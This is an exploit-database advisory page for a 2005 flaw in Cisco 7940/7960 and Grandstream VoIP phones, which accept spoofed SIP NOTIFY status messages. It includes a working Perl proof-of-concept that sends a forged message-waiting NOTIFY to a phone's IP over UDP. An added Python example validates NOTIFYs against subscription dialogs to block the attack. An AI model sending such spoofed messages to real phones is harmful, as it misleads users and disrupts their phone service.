Cisco VoIP Phone CP-7940 3.x – Spoofed SIP Status Message Handling

Vulnerability ID: 1055225    Vulnerability type:
Published: 2005-07-06    Updated: 2005-07-06
CVE ID: N/A
CNNVD-ID: N/A
Platform: Hardware    CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/25949
|Details
Vulnerability details have not yet been disclosed.
|Exploit
source: http://www.securityfocus.com/bid/14174/info

Multiple vendor VoIP phones handle spoofed SIP status messages improperly. This issue could potentially lead to a denial of service condition against a server.

The issue arises because the affected phones do not verify the 'Call-ID', 'tag' and 'branch' headers of NOTIFY messages, and process spoofed status messages instead of rejecting them.

Cisco 7940, Cisco 7960 and Grandstream BT 100 phones are affected by this issue. Other vendors may be vulnerable as well.

#!/usr/bin/perl
# SIP NOTIFY POC by [email protected]
use strict;
use warnings;
use Socket;

SendSIPTo("10.0.0.1"); # IP of the phone

sub SendSIPTo {
    my $phone_ip = shift;

    # Unsolicited message-summary NOTIFY: the Call-ID, From tag and Via branch
    # are arbitrary values that belong to no subscription dialog on the phone.
    # SIP lines end in CRLF and a blank line separates the headers from the
    # 37-byte body that Content-Length announces.
    my $MESG = join("\r\n",
        "NOTIFY sip:chaos\@$phone_ip:5060 SIP/2.0",
        'Via: SIP/2.0/UDP 1.2.3.4:5060;branch=000000000000000',
        'From: "drfrancky" <sip:[email protected]>;tag=000000000',
        "To:  <sip:chaos\@$phone_ip>",
        'Contact: <sip:[email protected]>',
        'Event: message-summary',
        'Call-ID: [email protected]',
        'CSeq: 102 NOTIFY',
        'Content-Type: application/simple-message-summary',
        'Content-Length: 37',
        '',
        'Messages-Waiting: yes',
        'Voicemail: 3/2');

    my $proto = getprotobyname('udp');
    socket(SOCKET, PF_INET, SOCK_DGRAM, $proto) or die "socket: $!\n";
    # Bind the local side to UDP/5060 so the datagram leaves from the SIP port.
    my $iaddr = inet_aton("0.0.0.0");
    my $paddr = sockaddr_in(5060, $iaddr);
    bind(SOCKET, $paddr) or die "bind: $!\n";
    my $port = 5060;
    my $hisiaddr = inet_aton($phone_ip) or die "inet_aton: bad address $phone_ip\n";
    my $hispaddr = sockaddr_in($port, $hisiaddr);
    send(SOCKET, $MESG, 0, $hispaddr) or warn "send $phone_ip: $!\n";
}
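The check the affected phones lack, as an added example (not code from the advisory or from any vendor): an incoming NOTIFY is matched against the subscription dialogs the phone itself created, using Call-ID plus the To and From tags as RFC 3261 prescribes, and anything that matches no dialog is answered with 481 instead of updating the message-waiting display. The subscription table, tags and addresses are constructed placeholders.

```python
import re

def parse_sip(raw):
    """Split a SIP request into (method, lowercase header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].split(" ", 1)[0], headers, body

def tag_of(value):
    m = re.search(r";tag=([^;\s]+)", value)  # ;tag= parameter of From/To, or None
    return m.group(1) if m else None

def check_notify(raw, subscriptions):
    """SIP status the phone should answer; subscriptions maps (Call-ID, local tag,
    remote tag) -> {"event", "last_cseq"} for dialogs the phone opened with SUBSCRIBE."""
    method, h, body = parse_sip(raw)
    required = ("via", "from", "to", "call-id", "cseq", "event")
    if method != "NOTIFY" or any(k not in h for k in required) or ";branch=" not in h["via"]:
        return 400  # malformed: missing headers or no branch parameter on Via
    # Dialog match for a request from the peer: our tag sits in To, theirs in From.
    sub = subscriptions.get((h["call-id"], tag_of(h["to"]), tag_of(h["from"])))
    if sub is None:
        return 481  # Subscription does not exist: ignore it, leave the MWI lamp alone
    if sub["event"] != h["event"].split(";")[0].strip():
        return 489  # Bad Event
    cseq = int(h["cseq"].split()[0])
    if cseq <= sub["last_cseq"]:
        return 500  # replayed or out-of-order CSeq inside the dialog
    if int(h.get("content-length", len(body))) != len(body):
        return 400
    sub["last_cseq"] = cseq
    return 200

def build_notify(call_id, from_tag, to_tag, cseq):
    # Constructed test input modelled on the PoC's NOTIFY; addresses are placeholders.
    to = "<sip:chaos@10.0.0.1>" + (f";tag={to_tag}" if to_tag else "")
    return "\r\n".join([
        "NOTIFY sip:chaos@10.0.0.1:5060 SIP/2.0", "Via: SIP/2.0/UDP 1.2.3.4:5060;branch=z9hG4bK7f3a",
        f'From: "mwi" <sip:mwi@1.2.3.4>;tag={from_tag}', f"To: {to}", "Event: message-summary",
        f"Call-ID: {call_id}", f"CSeq: {cseq} NOTIFY", "Content-Length: 37", "",
        "Messages-Waiting: yes\r\nVoicemail: 3/2"])

def phone_subscriptions():
    # Dialog state the phone keeps for the SUBSCRIBE it sent to its voicemail server.
    return {("mwi-1@10.0.0.1", "ph42", "srv77"): {"event": "message-summary", "last_cseq": 0}}
```

Phones configured for implicit MWI subscription (no SUBSCRIBE sent) have no dialog to match against; there the equivalent check is that the NOTIFY's source address is the configured voicemail server, since the Call-ID and tags alone carry no proof of origin.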
